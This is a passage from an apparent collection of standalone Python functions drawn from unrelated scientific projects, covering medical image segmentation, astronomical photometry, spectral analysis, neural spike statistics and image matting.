ants.registration(\n ants.rank_intensity(x),\n ants.rank_intensity(templatesmall), 'SyN',\n syn_sampling=2,\n syn_metric='CC',\n reg_iterations = [25,15,0,0],\n aff_metric='GC', random_seed=1 )\n afftx = qaff['fwdtransforms'][1]\n templateWMPrior2x = ants.apply_transforms( x, templateWMPrior, qaff['fwdtransforms'] )\n cerebrum = ants.threshold_image( xsegmentation, 2, 4 )\n realWM = ants.threshold_image( templateWMPrior2x , 0.1, math.inf )\n inimg = ants.rank_intensity( x )\n parcellateWMdnz = ants.kmeans_segmentation( inimg, 2, realWM, mrf=0.3 )['probabilityimages'][0]\n x2template = ants.apply_transforms( templatesmall, x, afftx, whichtoinvert=[True] )\n parcellateWMdnz2template = 
ants.apply_transforms( templatesmall,\n cerebrum * parcellateWMdnz, afftx, whichtoinvert=[True] )\n # features = rank+dnz-image, lprob, wprob, wprior at mybig resolution\n f1 = x2template.numpy()\n f2 = parcellateWMdnz2template.numpy()\n f3 = ants.apply_transforms( templatesmall, xWMProbability, afftx, whichtoinvert=[True] ).numpy()\n f4 = ants.apply_transforms( templatesmall, templateWMPrior, qaff['fwdtransforms'][0] ).numpy()\n myfeatures = np.stack( (f1,f2,f3,f4), axis=3 )\n newshape = np.concatenate( [ [1],np.asarray( myfeatures.shape )] )\n myfeatures = myfeatures.reshape( newshape )\n\n inshape = [None,None,None,4]\n wmhunet = antspynet.create_unet_model_3d( inshape,\n number_of_outputs = 1,\n number_of_layers = 4,\n mode = 'sigmoid' )\n\n wmhunet.load_weights( get_data(\"simwmhseg\", target_extension='.h5') )\n\n pp = wmhunet.predict( myfeatures )\n\n limg = ants.from_numpy( tf.squeeze( pp[0] ).numpy( ) )\n limg = ants.copy_image_info( templatesmall, limg )\n lesresam = ants.apply_transforms( x, limg, afftx, whichtoinvert=[False] )\n # lesresam = lesresam * cerebrum\n rnmdl = antspynet.create_resnet_model_3d( inshape,\n number_of_classification_labels = 1,\n layers = (1,2,3),\n residual_block_schedule = (3,4,6,3), squeeze_and_excite = True,\n lowest_resolution = 32, cardinality = 1, mode = \"regression\" )\n rnmdl.load_weights( get_data(\"simwmdisc\", target_extension='.h5' ) )\n qq = rnmdl.predict( myfeatures )\n\n lesresamb = ants.threshold_image( lesresam, wmh_thresh, 1.0 )\n lgo=ants.label_geometry_measures( lesresamb, lesresam )\n wmhsummary = pd.read_csv( get_data(\"wmh_evidence\", target_extension='.csv' ) )\n wmhsummary.at[0,'Value']=lgo.at[0,'VolumeInMillimeters']\n wmhsummary.at[1,'Value']=lgo.at[0,'IntegratedIntensity']\n wmhsummary.at[2,'Value']=float(qq)\n\n return {\n \"wmh_summary\":wmhsummary,\n \"wmh_probability_image\":lesresam,\n \"wmh_evidence_of_existence\":float(qq),\n \"wmh_max_prob\":lesresam.max(),\n \"features\":myfeatures }", "def find_peaks(f_arr, sigma, niter, bsigma=None):\n # set up the variables\n if bsigma is None:\n bsigma = sigma\n\n # determine the background statistics\n back_ave, back_std = find_backstats(f_arr, sigma, niter)\n\n # calculate the differences between the pixels\n dfh = f_arr[1:-1] - f_arr[:-2]\n dfl = f_arr[1:-1] - f_arr[2:]\n\n # find the objects\n mask = (dfh > 0) * (dfl > 0) * \\\n (abs(f_arr[1:-1] - back_ave) > back_std * sigma)\n t = np.where(mask)[0]\n return t + 1", "def calculate_psf_tilts():\n for order in [1, 2]:\n\n # Get the file\n path = 'files/SOSS_PSF_tilt_order{}.npy'.format(order)\n psf_file = resource_filename('awesimsoss', path)\n\n # Dimensions\n subarray = 'SUBSTRIP256'\n X = range(2048)\n Y = range(256)\n\n # Get the wave map\n wave_map = utils.wave_solutions(subarray, order).astype(float)\n\n # Get the y-coordinate of the trace polynomial in this column\n # (center of the trace)\n coeffs = trace_polynomials(subarray=subarray, order=order)\n trace = np.polyval(coeffs, X)\n\n # Interpolate to get the wavelength value at the center\n wave = interp2d(X, Y, wave_map)\n\n # Get the wavelength of the trace center in each column\n trace_wave = []\n for x, y in zip(X, trace):\n trace_wave.append(wave(x, y)[0])\n\n # For each column wavelength (defined by the wavelength at\n # the trace center) define an isowavelength contour\n angles = []\n for n, x in enumerate(X):\n\n w = trace_wave[x]\n\n # Edge cases\n try:\n w0 = trace_wave[x-1]\n except IndexError:\n w0 = 0\n\n try:\n w1 = trace_wave[x+1]\n except IndexError:\n 
w1 = 10\n\n # Define the width of the wavelength bin as half-way\n # between neighboring points\n dw0 = np.mean([w0, w])\n dw1 = np.mean([w1, w])\n\n # Get the coordinates of all the pixels in that range\n yy, xx = np.where(np.logical_and(wave_map >= dw0, wave_map < dw1))\n\n # Find the angle between the vertical and the tilted wavelength bin\n if len(xx) >= 1:\n angle = get_angle([xx[-1], yy[-1]], [x, trace[x]])\n else:\n angle = 0\n\n # Don't flip them upside down\n angle = angle % 180\n\n # Add to the array\n angles.append(angle)\n\n # Save the file\n np.save(psf_file, np.array(angles))\n print('Angles saved to', psf_file)", "def haperfluxMany(inputlist, maplist, radius, rinner, router, galactic=True, decimal=True, noise_model=0):\n\n ## Names and frequencies of the sample maps included in this repo.\n\n freqlist = ['30','44','70','100','143','217','353','545','857','1249','1874','2141','2998','3331','4612','4997','11992','16655','24983','24983','24983','33310']\n freqval = [28.405889, 44.072241,70.421396,100.,143.,217.,353.,545.,857.,1249.,1874.,2141.,2141.,2998.,2998.,3331.,4612.,4997.,11992.,16655.,24983.,24983.,24983.,33310.]\n band_names = [\"akari9\", \"dirbe12\",\"iras12\",\"wise12\",\"akari18\",\"iras25\",\"iras60\",\"akari65\",\"akari90\",\"dirbe100\",\"iras100\",\"akari140\",\"dirbe140\",\"akari160\",\"dirbe240\",\"planck857\", \"planck545\"]\n\n k0 = 1.0\n k1 = rinner/radius\n k2 = router/radius\n apcor = ((1 - (0.5)**(4*k0**2))-((0.5)**(4*k1**2) - (0.5)**(4*k2**2)))**(-1)\n\n # 'galactic' overrules 'decimal'\n if (galactic==True):\n dt=[('sname',np.dtype('S13')),('glon',np.float32),('glat',np.float32)]\n targets = np.genfromtxt(inputlist, delimiter=\",\",dtype=dt)\n\n ns = len(targets['glat'])\n\n fd3 = -1\n fd_err3 = -1\n\n fn = np.genfromtxt(maplist, delimiter=\" \", dtype='str')\n nmaps = len(fn)\n ## Initialize the arrays which will hold the results\n fd_all = np.zeros((ns,nmaps))\n fd_err_all = np.zeros((ns,nmaps))\n fd_bg_all = np.zeros((ns,nmaps))\n\n # Start the actual processing: Read-in the maps.\n for ct2 in range(0,nmaps):\n xtmp_data, xtmp_head = hp.read_map(fn[ct2], h=True, verbose=False, nest=False)\n freq = dict(xtmp_head)['FREQ']\n units = dict(xtmp_head)['TUNIT1']\n freq_str = str(freq)\n idx = freqlist.index(str(freq))\n currfreq = int(freq)\n\n if (radius == None):\n radval = fwhmlist[idx]\n else:\n radval = radius\n\n\n for ct in range(0,ns):\n\n glon = targets['glon'][ct]\n glat = targets['glat'][ct]\n\n fd_all[ct,ct2], fd_err_all[ct,ct2], fd_bg_all[ct,ct2] = \\\n haperflux(inmap= xtmp_data, freq= currfreq, lon=glon, lat=glat, aper_inner_radius=radius, aper_outer_radius1=rinner, \\\n aper_outer_radius2=router,units=units, noise_model=noise_model)\n\n if (np.isfinite(fd_err_all[ct,ct2]) == False):\n fd_all[ct,ct2] = -1\n fd_err_all[ct,ct2] = -1\n else:\n if radius==None:\n fd_all[ct,ct2] = fd_all[ct,ct2]*apcor\n fd_err_all[ct,ct2] = fd_err_all[ct,ct2]*apcor\n\n return fd_all, fd_err_all, fd_bg_all", "def tapered_spectra(s, tapers, NFFT=None, low_bias=True):\r\n N = s.shape[-1]\r\n # XXX: don't allow NFFT < N -- not every implementation is so restrictive!\r\n if NFFT is None or NFFT < N:\r\n NFFT = N\r\n rest_of_dims = s.shape[:-1]\r\n M = int(np.product(rest_of_dims))\r\n\r\n s = s.reshape(int(np.product(rest_of_dims)), N)\r\n # de-mean this sucker\r\n s = utils.remove_bias(s, axis=-1)\r\n\r\n if not isinstance(tapers, np.ndarray):\r\n # then tapers is (NW, K)\r\n args = (N,) + tuple(tapers)\r\n dpss, eigvals = dpss_windows(*args)\r\n if low_bias:\r\n 
keepers = (eigvals > 0.9)\r\n dpss = dpss[keepers]\r\n eigvals = eigvals[keepers]\r\n tapers = dpss\r\n else:\r\n eigvals = None\r\n K = tapers.shape[0]\r\n sig_sl = [slice(None)] * len(s.shape)\r\n sig_sl.insert(len(s.shape) - 1, np.newaxis)\r\n\r\n # tapered.shape is (M, Kmax, N)\r\n tapered = s[sig_sl] * tapers\r\n\r\n # compute the y_{i,k}(f) -- full FFT takes ~1.5x longer, but unpacking\r\n # results of real-valued FFT eats up memory\r\n t_spectra = fftpack.fft(tapered, n=NFFT, axis=-1)\r\n t_spectra.shape = rest_of_dims + (K, NFFT)\r\n if eigvals is None:\r\n return t_spectra\r\n return t_spectra, eigvals", "def process_noise(qubit, tstep, noise_samples, sigma_array):\n from scipy.stats import norm\n noise_weights = np.zeros((len(sigma_array), len(noise_samples)))\n average_chi_array = np.zeros((len(sigma_array), 9,9), dtype=complex)\n raw_chi_array = noise_iteration(qubit, tstep, noise_samples)\n for i in range(len(sigma_array)):\n noise_weights[i, :] += norm.pdf(noise_samples, loc=0.0, scale=sigma_array[i])\n average_chi_array[i, :, :] += noise_averaging(noise_samples, noise_weights[i, :], raw_chi_array)\n return average_chi_array, raw_chi_array", "def wrapper_fit_func(x, ntraps, *args):\n a, b, c = list(args[0][:ntraps]), list(args[0][ntraps:2 * ntraps]), list(args[0][2 * ntraps:3 * ntraps])\n offset = args[0][-1]\n return gaussianarray1d(x, a, b, c, offset, ntraps)", "def addNoise_amp(array,counts):\r\n if array.dtype == 'complex' :\r\n arrayout = addNoise(np.real(array),counts) + 1.0J * addNoise(np.imag(array),counts)\r\n else :\r\n if np.float64(counts) == 0.0e0 :\r\n arrayout = np.copy(array)\r\n elif np.float64(counts) < 0.0e0 :\r\n print 'bg.addNoise : warning counts < 0'\r\n else :\r\n arrayout = np.zeros(array.shape)\r\n arrayout = np.square(normalise(array))\r\n arrayout = np.random.poisson(arrayout*np.float64(counts))/np.float64(counts)\r\n arrayout = np.sqrt(arrayout)\r\n tot = np.sum(np.abs(array)**2)\r\n arrayout = normalise(arrayout,tot)\r\n return arrayout", "def single_channel_stacking(tifs):\n template_ID=int(len(tifs)/2)\n \n template_raster=gdal_array.LoadFile(tifs[template_ID-1])\n avg_raster=np.zeros_like(template_raster)\n avg_raster=avg_raster+1\n new_raster=np.copy(template_raster)\n # ones=np.full(template_raster.shape, 1)\n for i, tif in enumerate(tifs, start=1):\n if i==template_ID: \n continue\n \n tif_raster=gdal_array.LoadFile(tif)\n # tif_raster=cut_transformed_array_borders(tif_raster)\n result=ird.similarity(template_raster,tif_raster , numiter=1, order=1)\n img_transformed= ird.transform_img(tif_raster, scale=result['scale'], angle=result['angle'], tvec=result['tvec'], mode='constant', bgval=0, order=2)\n \n img_transformed=cut_transformed_array_borders(img_transformed)\n \n # ones_transformed=ird.transform_img(ones, scale=result['scale'], angle=result['angle'], tvec=result['tvec'], mode='constant', bgval=0, order=1)\n ones_transformed=np.zeros_like(template_raster)\n ones_transformed[np.where(img_transformed>0)]=1\n print(ones_transformed)\n \n print(np.mean(ones_transformed), np.max(ones_transformed), np.min(ones_transformed))\n print(ones_transformed[np.where(ones_transformed>0)])\n print(np.min(ones_transformed[np.where(ones_transformed>0)]))\n print(np.max(ones_transformed[np.where(ones_transformed>0)]))\n\n plt.imshow(ones_transformed)\n plt.show()\n plt.close()\n \n # ones_transformed=cut_transformed_array_borders(ones_transformed)\n \n avg_raster=avg_raster+ones_transformed\n # ird.imshow(template_raster, tif_raster, img_transformed)\n \n 
new_raster=new_raster+img_transformed\n \n # new_raster=new_raster+template_raster \n # new_raster=new_raster/len(tifs)\n\n gtz=np.where(avg_raster>0)\n \n\n \n\n \n \n plt.imshow(new_raster)\n plt.show()\n plt.close()\n # gdal_array.SaveArray(new_raster, tifs[0][:-4]+\"_not_abvertaghe_stacked_.tiff\")\n new_raster[gtz]=new_raster[gtz]/avg_raster[gtz] \n gdal_array.SaveArray(new_raster, tifs[0][:-4]+\"_stacked_.tiff\")\n plt.imshow(new_raster)\n plt.savefig(\"test.tif\", dpi=800)\n plt.show()\n plt.close()\n\n def discrete_cmap(N, base_cmap=None):\n \"\"\"Create an N-bin discrete colormap from the specified input map\"\"\"\n \n # Note that if base_cmap is a string or None, you can simply do\n # return plt.cm.get_cmap(base_cmap, N)\n # The following works for string, None, or a colormap instance:\n \n base = plt.cm.get_cmap(base_cmap)\n color_list = base(np.linspace(0, 1, N))\n cmap_name = base.name + str(N)\n return base.from_list(cmap_name, color_list, N)\n\n cmap=discrete_cmap(int(avg_raster.max())+1, base_cmap=\"ocean\") \n \n norm=mpl.colors.BoundaryNorm(np.arange(-0.5,int(avg_raster.max()+1)), cmap.N)\n fig=plt.figure()\n fig.set_size_inches(5,4)\n ax=fig.add_subplot(111)\n data=ax.matshow(avg_raster, cmap=cmap, norm=norm)\n fig.colorbar(data, ticks=np.linspace(0,int(avg_raster.max()),int(avg_raster.max()+1)), drawedges=True)\n\n plt.show()\n plt.close()\n\n\n # gdal_array.SaveArray(new_raster, tifs[0][:-4]+\"_stacked_.tiff\")", "def pick_triplets_images(images, n_triplets):\n\n indices = _pick_triplets(len(images), n_triplets)\n\n n_samples = len(indices)\n\n n_rows, n_cols, n_channels = images[0].shape\n\n images_samples = np.zeros((n_samples,n_rows, n_cols, n_channels), dtype = np.uint8)\n\n for i, index in enumerate(indices):\n images_samples[i] = images[index]\n\n return images_samples", "def extract_features_2d(\n dim,\n img,\n n_sigmas,\n intensity=True,\n edges=True,\n texture=True,\n sigma_min=0.5,\n sigma_max=16\n):\n\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n logging.info('Extracting features from channel %i' % (dim))\n\n # computations are faster as float32\n img = img_as_float32(img)\n\n sigmas = np.logspace(\n np.log2(sigma_min),\n np.log2(sigma_max),\n num=n_sigmas, #int(np.log2(sigma_max) - np.log2(sigma_min) + 1),\n base=2,\n endpoint=True,\n )\n\n if (psutil.virtual_memory()[0]>10000000000) & (psutil.virtual_memory()[2]<50): #>10GB and <50% utilization\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n logging.info('Extracting features in parallel')\n logging.info('Total RAM: %i' % (psutil.virtual_memory()[0]))\n logging.info('percent RAM usage: %f' % (psutil.virtual_memory()[2]))\n\n all_results = Parallel(n_jobs=-2, verbose=0)(delayed(features_sigma)(img, sigma, intensity=intensity, edges=edges, texture=texture) for sigma in sigmas)\n else:\n\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n logging.info('Extracting features in series')\n logging.info('Total RAM: %i' % (psutil.virtual_memory()[0]))\n logging.info('percent RAM usage: %f' % (psutil.virtual_memory()[2]))\n\n n_sigmas = len(sigmas)\n all_results = [\n features_sigma(img, sigma, intensity=intensity, edges=edges, texture=texture)\n for sigma in sigmas\n ]\n\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n logging.info('Features from channel %i for all scales' % (dim))\n\n return list(itertools.chain.from_iterable(all_results))", "def update_for_in_trap(self, t, traps): #******\n sources = traps.param['source_locations'] #Of format 
[(0,0),]\n for trap_num, trap_loc in enumerate(sources):\n dist_vals = distance((self.x_position, self.y_position),trap_loc)\n mask_trapped = dist_vals < traps.param['trap_radius']\n self.mode[mask_trapped] = self.Mode_Trapped\n self.trap_num[mask_trapped] = trap_num\n self.x_trap_loc[mask_trapped] = trap_loc[0]\n self.y_trap_loc[mask_trapped] = trap_loc[1]\n self.x_velocity[mask_trapped] = 0.0\n self.y_velocity[mask_trapped] = 0.0\n\n # Get time stamp for newly trapped flies\n mask_newly_trapped = mask_trapped & (self.t_in_trap == scipy.inf)\n self.t_in_trap[mask_newly_trapped] = t", "def extract_templates(im, interactive = False):\n\n im = np.flipud(im)\n# tmp = cv2.medianBlur(im, 5)\n# tmp = cv2.threshold(tmp, 255*0.65, 255, cv2.THRESH_BINARY)[1]\n\n im_filtered = filter_specgram(im, interactive)\n _, contours, _ = cv2.findContours(\n im_filtered,\n cv2.RETR_LIST,\n cv2.CHAIN_APPROX_SIMPLE\n )\n\n templates = []\n\n im_dbg_template_rejected = None\n im_dbg_template_overlay = None\n if interactive:\n im_dbg_template_rejected = im.copy()\n im_dbg_template_overlay = im.copy()\n\n #im_dbg_template_overlay *= 255/im_dbg_template_overlay.max()\n\n\n # apply trunc threshold\n # apply gaussian blur\n # apply binary threshold\n # remove small blobs\n # remove huge blobs\n # for each blob, check surrounding blobs within given radius and add \n # (how to choose which to add? what radius?\n smallest = -1\n average_val = np.average(im)\n print 'average: {}'.format(average_val)\n\n for i in xrange(len(contours)):\n r = cv2.boundingRect(contours[i])\n\n left = max(0, r[0] - 10)\n top = max(0, r[1] - 10)\n right = min(len(im[0]), r[0] + r[2] + 10)\n bottom = min(len(im), r[1] + r[3] + 10)\n\n area = r[2] * r[3]\n\n #TODO: use average values from sgram?\n if area < 50 or area > 10000: # : continue\n #if area > 10000:\n if not interactive: continue\n# cv2.putText(im_dbg_template_rejected, '{}'.format(area),\n# (left, top), cv2.FONT_HERSHEY_PLAIN, 1.0,\n# int(np.max(im_dbg_template_rejected)))\n cv2.rectangle(im_dbg_template_rejected, (left,top), (right,bottom), int(np.max(im_dbg_template_rejected)), 1)\n continue\n\n if smallest == -1 or area < smallest: smallest = area\n\n x = im[top:bottom, left:right]\n #x = im[r[1]:r[1]+r[3], r[0]:r[0]+r[2]]\n if np.min(x) >= average_val:\n if not interactive: continue\n cv2.putText(im_dbg_template_rejected, 'v:{}'.format(np.average(x)), (left, top), cv2.FONT_HERSHEY_PLAIN, 1.0, int(np.max(im_dbg_template_rejected)))\n cv2.rectangle(im_dbg_template_rejected, (left,top), (right,bottom), int(np.max(im_dbg_template_rejected)), 1)\n continue\n x = cv2.GaussianBlur(x, (0,0), 1.5)\n templates.append(x)\n\n if interactive:\n cv2.rectangle(im_dbg_template_overlay, (left, top), (right, bottom), int(np.max(im_dbg_template_overlay)), 1)\n #cv2.rectangle(im_dbg_template_overlay, (r[0]-10, r[1]-10), (r[0]+r[2]+10, r[1]+r[3]+10), (255,0,0), 1)\n if interactive:\n plotMultiple([im_dbg_template_overlay, im_dbg_template_rejected],\n #plotMultiple([im_filtered, im_dbg_template_rejected],\n None,\n ['templates', 'rejected'])\n\n\n# cv2.namedWindow('orig')\n# cv2.imshow('orig', im_dbg_template_overlay)\n# cv2.namedWindow('rejected')\n# cv2.imshow('rejected', im_dbg_template_rejected)\n # plt.imshow(im_dbg_template_overlay, aspect='auto')\n # plt.show()\n print 'smallest: {}'.format(smallest)\n plt_(im_dbg_template_rejected,'reject')\n plt_(im_dbg_template_overlay,'accept')\n# while cv2.waitKey(0) != ord('n'):\n# pass\n\n return templates", "def dump_psth_peaks(ffname, outprefix, 
celltype, window=100e-3, binwidth=5e-3):\n with open('{}_psth_{}_{}ms_window_{}ms_bins.csv'.format(outprefix, celltype, window*1e3, binwidth*1e3), 'wb') as fd:\n writer = csv.writer(fd, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n dbcnt_flist = get_dbcnt_dict(ffname)\n bins = np.arange(-window / 2.0, window / 2.0 + 0.5 * binwidth, binwidth)\n writer.writerow(['dbcount', 'filename'] + list(np.asarray(np.round(bins[1:]*1e3), dtype=int)))\n for dbcnt, flist in dbcnt_flist.items():\n for fname in flist:\n data = TraubData(makepath(fname))\n pop_train_list = []\n bgtimes, probetimes = get_stim_times(data, correct_tcr=True)\n if (len(bgtimes) == 0) and (len(probetimes) == 0):\n print 'EE: {} has no TCR spiking on stimulus.'.format(fname)\n continue\n stim_times = np.concatenate((bgtimes, probetimes))\n stim_times.sort()\n # print '###', stim_times\n for cell, train in data.spikes.items():\n if cell.startswith(celltype):\n pop_train_list.append(train)\n pop_train = np.concatenate(pop_train_list)\n pop_train.sort()\n \n bgpsth, b = psth(pop_train, stim_times, window=window, bins=bins)\n bgpsth /= (data.cellcounts._asdict()[celltype] * binwidth)\n writer.writerow([dbcnt, fname] + list(bgpsth))", "def peaks_mc(t, y, e, thresh=0, N_trials=5000, N_peaks=None, **pgram_kwargs):\n tstart = timeit.default_timer()\n\n def do_trial(**kwargs):\n y_jig = np.random.normal(y, e)\n periods, power = lombscargle(t, y_jig, **kwargs)\n peaks = peak_indices(power, thresh=thresh)\n pk_periods = periods[peaks]\n pk_power = power[peaks]\n if N_peaks is not None and pk_periods.size >= N_peaks:\n pk_periods = pk_periods[0:N_peaks]\n pk_power = power[0:N_peaks]\n return periods, pk_periods, pk_power\n \n # Do one trial to get the periods\n periods, mc_pk_periods, mc_pk_power = do_trial(**pgram_kwargs)\n \n # Now do the rest\n for i in range(N_trials - 1):\n periods, pk_periods, pk_power = do_trial(periods=periods)\n mc_pk_periods = np.append(mc_pk_periods, pk_periods)\n mc_pk_power = np.append(mc_pk_power, pk_power)\n tend = timeit.default_timer()\n print(\"trials=%i peaks=%i thresh=%0.3g\" % (N_trials, mc_pk_periods.size, thresh))\n print(\"%i trials of %i samples to %i periods in %f s\" % \\\n (N_trials, y.size, periods.size, tend - tstart))\n return mc_pk_periods, mc_pk_power", "def tqumap_homog_noise( pix, nlev_t, nlev_p):\n nx, dx, ny, dy = pix.nx, pix.dx, pix.ny, pix.dy\n \n ret = maps.tqumap( nx, dx, ny=ny, dy=dy )\n ret.tmap += np.random.standard_normal(ret.tmap.shape) * nlev_t / (180.*60./np.pi*np.sqrt(ret.dx * ret.dy))\n ret.qmap += np.random.standard_normal(ret.qmap.shape) * nlev_p / (180.*60./np.pi*np.sqrt(ret.dx * ret.dy))\n ret.umap += np.random.standard_normal(ret.umap.shape) * nlev_p / (180.*60./np.pi*np.sqrt(ret.dx * ret.dy))\n return ret", "def test_gaussian():\n generator = SignalGenerator()\n data = generator.random_gaussian(means=[1, 0, -1], stds=[0.1, 0.1, 0.1])\n freq_features = FrequencyFeature(data, sr=50)\n freq_features.fft().peaks()\n top_n = range(1, 11)\n top_n_dominant_frequencies = np.concatenate(\n list(map(freq_features.dominant_frequency_power, top_n)), axis=0)\n std_top_n_dfs = np.std(top_n_dominant_frequencies, axis=0)\n assert np.all(std_top_n_dfs < 0.001)", "def countmap(band,skypos,tranges,skyrange,width=False,height=False,\n\t\t\t verbose=0,tscale=1000.,memlight=False,hdu=False,retries=20):\n\timsz = gxt.deg2pix(skypos,skyrange)\n\tcount = np.zeros(imsz)\n\tfor trange in tranges:\n\t\t# If memlight is requested, break the integration into\n\t\t# smaller 
chunks.\n\t\tstep = memlight if memlight else trange[1]-trange[0]\n\t\tfor i in np.arange(trange[0],trange[1],step):\n\t\t\tt0,t1=i,i+step\n\t\t\tif verbose:\n\t\t\t\tprint_inline('Coadding '+str(t0)+' to '+str(t1))\n\t\t\tevents = gQuery.getArray(gQuery.rect(band,skypos[0],skypos[1],t0,t1,\n\t\t\t\t\t\t\t\t\t\t\t\t skyrange[0],skyrange[1]),\n\t\t\t\t\t\t\t\t\t verbose=verbose,retries=retries)\n\n\t\t\t# Check that there is actually data here.\n\t\t\tif not events:\n\t\t\t\tif verbose>1:\n\t\t\t\t\tprint \"No data in \"+str([t0,t1])\n\t\t\t\tcontinue\n\n\t\t\ttimes = np.array(events,dtype='float64')[:,0 ]/tscale\n\t\t\tcoo =\tnp.array(events,dtype='float64')[:,1:]\n\n\t\t\t# If there's no data, return a blank image.\n\t\t\tif len(coo)==0:\n\t\t\t\tif verbose:\n\t\t\t\t\tprint 'No data in this frame: '+str([t0,t1])\n\t\t\t\tcontinue\n\n\t\t\t# Define World Coordinate System (WCS)\n\t\t\twcs = define_wcs(skypos,skyrange,width=False,height=False)\n\n\t\t\t# Map the sky coordinates onto the focal plane\n\t\t\tfoc = wcs.sip_pix2foc(wcs.wcs_world2pix(coo,1),1)\n\n\t\t\t# Bin the events into actual image pixels\n\t\t\tH,xedges,yedges=np.histogram2d(foc[:,1]-0.5,foc[:,0]-0.5,\n\t\t\t\t\t\t\t\tbins=imsz,range=([ [0,imsz[0]],[0,imsz[1]] ]))\n\t\t\tcount += H\n\n\treturn count", "def airgaps_from_sequence(self, seq_model, tfrms):\n for e in self.elements:\n if isinstance(e, AirGap):\n return # found an AirGap, model probably OK\n\n num_elements = 0\n seq_model = self.opt_model.seq_model\n for i, g in enumerate(seq_model.gaps):\n if g.medium.name().lower() == 'air':\n if i > 0:\n s = seq_model.ifcs[i]\n tfrm = tfrms[i]\n self.process_airgap(seq_model, i, g, s, tfrm,\n num_elements, add_ele=False)", "def find_peaks_(image):\n\n height, width = image.shape[:2]\n img_matrix = [sum(i)/len(i) for i in image]\n x=[i for i in range(height)]\n y = [255-i for i in img_matrix]\n y = gaussian_filter(y, sigma=20)\n maxs, _ = find_peaks(y)\n maxs = maxs.tolist()\n\n return maxs", "def make_td_images(td, num_spikes, step_factor=1):\n assert isinstance(td, ev.Events)\n assert isinstance(num_spikes, int)\n assert num_spikes > 0\n assert step_factor > 0\n\n # with timer.Timer() as my_timer:\n event_offset = 0\n images = []\n while event_offset + num_spikes < td.data.size:\n image = np.zeros((td.height, td.width), dtype=np.uint8)\n unique_spike_count = 0\n index_ptr = event_offset\n while (unique_spike_count < num_spikes) & (index_ptr < td.data.size):\n event = td.data[index_ptr]\n y = event.y\n x = event.x\n if image[y, x] == 0:\n image[y, x] = 255\n unique_spike_count += 1\n\n index_ptr += 1\n\n # cv2.imshow('img', img)\n # cv2.waitKey(1)\n if unique_spike_count < num_spikes:\n break\n\n images.append(image)\n\n # offset next image\n total_spikes_traversed = index_ptr - event_offset\n event_offset += math.floor(total_spikes_traversed * step_factor) + 1\n # print 'Making images out of bin file took %s seconds' % my_timer.secs\n\n return images", "def transform(self, imgList):\n res = []\n for img in tqdm(imgList):\n y_mean = np.mean(img, axis=1)\n self.get_filtration(y_mean)\n seg = self.get_segments()\n seg = sorted(seg, key=lambda x:x[0])\n res.append(seg)\n return res", "def getstats(img, thresholds):\n number = np.zeros(img.shape, np.float64)\n ev = np.zeros(img.shape, np.float64)\n scatter = np.zeros(img.shape, np.float64)\n for n, s, low, high, evs in thresholds:\n for i in numba.prange(img.shape[0]):\n for j in numba.prange(img.shape[1]):\n if (low < img[i, j]) and (img[i, j] < high):\n scatter[i, j] = s\n 
number[i, j] = n\n ev[i, j] = img[i, j] - evs\n return ev, number, scatter", "def multi_sigma_noise_sampling(qubit, tstep, sigma_array, num_samples):\n\n noise_samples0 = np.linspace(-5*sigma_array[-1], 5*sigma_array[-1], num_samples)\n average_chi_array0, raw_chi_array0 = process_noise(qubit, tstep, noise_samples0, sigma_array)\n \n converge_value = 1.0\n num_runs = 1\n # Used to progressively refine the sampling space\n sig_index = -1\n\n while converge_value > 1e-7:\n if num_runs % 3 == 0:\n noise_samples1 = wing_doubling(noise_samples0, sigma_array[sig_index])\n else:\n noise_samples1 = two_sigma_doubling(noise_samples0, sigma_array[sig_index])\n average_chi_array1, raw_chi_array1 = process_noise(qubit, tstep, noise_samples1, sigma_array)\n\n converge_array = np.zeros((len(sigma_array)))\n\n diff_matrix = average_chi_array1 - average_chi_array0\n converge_array = np.real(np.sqrt(\n np.einsum('ijj',\n np.einsum('ijk,ikm->ijm', diff_matrix, \n np.einsum('ikj', diff_matrix.conj())))))\n \n # Ensure that all of the individual chi-matrices have converged\n converge_value = np.max(converge_array)\n for i, norm in reversed(list(enumerate(converge_array))):\n if norm < 1e-8:\n sig_index = i\n break\n\n noise_samples0 = noise_samples1\n average_chi_array0 = average_chi_array1\n raw_chi_array0 = raw_chi_array1\n print(converge_array)\n print(num_runs)\n num_runs += 1\n return len(noise_samples1), average_chi_array1", "def get_spike_times_ps(nn, n_ps=1, frac=1.):\n sp = []\n n = 0\n for gr in nn.p_ass_index[n_ps]:\n for nrn in gr[0:frac * len(gr)]:\n for t in nn.mon_spike_e[nrn]:\n sp.append((n, t))\n n += 1\n\n return sp", "def findRMpeaks(self, pix, threshold):\n\t\tsigma = np.std(self.getz(pix))\n\t\tdetections = []\n\t\tfor i, phi in enumerate(self.getz(pix)):\n \t\t \tif phi > threshold*sigma: detections.append(i)\n \t \treturn detections", "def get_amplitude_map(self, timeWindow=(0, 0.5)):\n\n windowIndex = np.logical_and(self.time>=timeWindow[0], self.time<=timeWindow[1])\n\n indON,indOFF,allAltPos,allAziPos = self._sort_index()\n\n ampON = np.zeros(indON.shape); ampON[:]=np.nan; ampOFF = ampON.copy()\n\n for i in np.ndindex(indON.shape):\n traceIndON = indON[i]; traceIndOFF = indOFF[i]\n if traceIndON is not None: ampON[i] = np.mean(np.mean(self.data[traceIndON]['traces'],axis=0)[windowIndex])\n if traceIndOFF is not None: ampOFF[i] = np.mean(np.mean(self.data[traceIndOFF]['traces'],axis=0)[windowIndex])\n\n return ampON, ampOFF, allAltPos, allAziPos", "def averageTrialsByTriggers(trigger_indices, np_data):\n trialLen = trigger_indices[1] -trigger_indices[0] -1\n data_avg = [] \n data_std = [] \n\n for i in trigger_indices:\n data_avg.append(numpy.average(np_data[i+1:i+trialLen-1])) \n data_std.append(numpy.std(np_data[i+1:i+trialLen-1])) \n \n return (data_avg, data_std)", "def bayes_matting(img, trimap, sigma_d=10, it=1):\n assert img.shape[:-1] == trimap.shape\n\n img = img / 255.0\n nrows, ncols = img.shape[:-1]\n\n # initial alpha guess\n alpha = np.zeros(trimap.shape)\n alpha[trimap == 255] = 1\n alpha[trimap == 128] = 0.5\n\n B = img[alpha == 0] # background pixel mask\n F = img[alpha == 1] # foreground pixel mask\n\n mean_B = np.mean(B, axis=0)\n cov_B = np.cov(B.T)\n mean_F = 